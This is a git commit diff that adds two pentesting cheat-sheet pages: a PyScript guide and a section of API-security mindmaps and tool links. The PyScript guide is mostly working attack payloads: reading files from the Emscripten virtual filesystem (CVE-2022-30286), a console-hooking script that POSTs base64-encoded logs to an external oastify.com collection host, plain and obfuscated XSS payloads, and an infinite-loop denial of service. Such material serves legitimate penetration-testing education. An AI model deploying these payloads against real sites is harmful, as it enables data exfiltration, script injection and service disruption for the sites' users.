Merge pull request #332 from Cyber-Guy1/master

Adding PyScript Pentesting Guide
2025-02-16 14:08:26 +00:00 · 2022-05-16 09:15:40 +01:00 · 2022-05-16 09:15:40 +01:00 · dee42017ff
commit dee42017ff
parent 3a57b8ea62 051c8185e7
2 changed files with 153 additions and 0 deletions
--- a/Guide/README.md
+++ b/Guide/README.md
@ -0,0 +1,96 @@
+# PyScript Pentesting Guide
+PyScript is a new framework developed for integrating Python in the HTML so, it can be used alongside HTML. In this cheat sheet you'll find how to use the PyScript for your penetration testing purposes.
+
+## Dumping / Retrieving files from the Emscripten virtual memory filesystem:
+<small>`CVE ID: CVE-2022-30286`</small>
+<br><br>
+Code:
+```
+<py-script>
+        with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
+        out = fin.read()
+        print(out)
+</py-script>
+```
+
+Result:
+
+![image](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)
+
+## [OOB Data Exfiltration of the Emscripten virtual memory filesystem (console monitoring)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)
+<small>`CVE ID: CVE-2022-30286`</small>
+<br><br>
+Code:
+```
+   <py-script>
+x = "CyberGuy"
+if x == "CyberGuy":
+    with open('/lib/python3.10/asyncio/tasks.py') as output:
+        contents = output.read()
+        print(contents)
+print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
+   </py-script>
+```
+
+Result:
+
+![image](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)
+
+## Cross Site Scripting (Ordinary)
+
+Code:
+```
+<py-script>
+        print("<img src=x onerror='alert(document.domain)'>")
+</py-script>
+```
+
+Result:
+
+![image](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)
+
+## Cross Site Scripting (Python Obfuscated)
+
+Code:
+```
+<py-script>
+sur = "\u0027al";fur = "e";rt = "rt"
+p = "\x22x$$\x22\x29\u0027\x3E"
+s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
+e = "c\u003d";q = "x"
+y = "o";m = "ner";z = "ror\u003d"
+
+print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
+</py-script>
+```
+
+Result:
+
+![image](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)
+
+## Cross Site Scripting (JavaScript Obfuscation)
+
+Code:
+```
+<py-script>
+   print("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
+ </py-script>
+```
+
+Result:
+
+![image](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)
+
+## DoS attack (Infinity loop)
+
+Code:
+```
+    <py-script>
+      while True:
+         print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;")
+   </py-script>
+```
+
+Result:
+
+![image](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)
--- a/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/network-services-pentesting/pentesting-web/web-api-pentesting.md
@ -128,6 +128,63 @@ Old versions may be still be in use and be more vulnerable than latest endpoints
 * `/api/CharityEventFeb2020/user/pp/<ID>`
 * `/api/CharityEventFeb2021/user/pp/<ID>`

+# 🛡️ API Security Empire Cheat Sheet
+<br>
+  <small>Cheat Sheet Author: <a href="https://www.linkedin.com/in/momen-eldawakhly-3b6250204">Momen Eldawakhly (Cyber Guy)</a></small>
+<br><br>
+In this repository you will find: Mindmaps, tips & tricks, resources and every thing related to API Security and API Penetration Testing. Our mindmaps and resources are based on OWASP TOP 10 API, our expereince in Penetration testing and other resources to deliver the most advanced and accurate API security and penetration testing resource in the WEB!!
+
+## 🚪 First gate: ```{{Recon}}``` 
+
+The first gate to enter the API Security Empire is to know how to gather information about the API infrastructure and how to perform a powerfull recon on API to extract the hidden doors which made you compromise the whole infrastructure from, so, we provide this updated API Recon mindmap with the latest tools and methodologies in API recon:
+
+<br>
+
+<div align="center">
+<img src="https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap.png" width="70%" height="70%" target="_blank">
+  
+<small><b><a href="https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap.pdf" target="_blank">PDF Version</a> | <a href="https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap.xmind" target="_blank">XMind Version</a></b></small>
+</div>
+<br>
+
+### ⚔️ Weapons you will need: 
+- [BurpSuite](https://portswigger.net/burp/releases)
+- [FFUF](https://github.com/ffuf/ffuf)
+- [Arjun](https://github.com/InsiderPhD/Arjun)
+- [Postman](https://www.postman.com/downloads/)
+- [SecLists](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content)
+- [FuzzDB](https://github.com/fuzzdb-project/fuzzdb)
+- [SoapUI](https://www.soapui.org/downloads/soapui/)
+- [GraphQL Voyager](https://apis.guru/graphql-voyager/)
+- [Kiterunner](https://github.com/assetnote/kiterunner)
+- [unfurl](https://github.com/tomnomnom/unfurl)
+
+### 🏋️ Test your abilities and weapons: 
+- [vapi](https://github.com/roottusk/vapi)
+- [Generic-University](https://github.com/InsiderPhD/Generic-University)
+
+## 🚪 Second gate: ```{{Attacking}}```
+
+### Attacking RESTful & SOAP:
+
+<div align="center">
+<img src="https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap%20ATTACK.png" target="_blank">
+<br>
+<small><b><a href="https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap%20ATTACK.pdf" target="_blank">PDF Version</a> | <a href="https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap%20ATTACK.xmind" target="_blank">XMind Version</a></b></small>
+</div>
+<br>
+
+### Attacking GraphQL:
+
+Due to the limited attacks in the GraphQL we tried to generate all the possible attacks due to our experience in testing APIs in the coming mindmap:
+
+<div align="center">
+<img src="https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap%20%7B%7BGraphQL%20Attacking%7D%7D.png">
+<br>
+<small><b><a href="https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap%20%7B%7BGraphQL%20Attacking%7D%7D.pdf" target="_blank">PDF Version</a> | <a href="https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap%20%7B%7BGraphQL%20Attacking%7D%7D.xmind" target="_blank">XMind Version</a></b></small>
+</div>
+<br>
+
 # Owasp API Security Top 10

 Read this document to learn how to **search** and **exploit** Owasp Top 10 API vulnerabilities: [https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)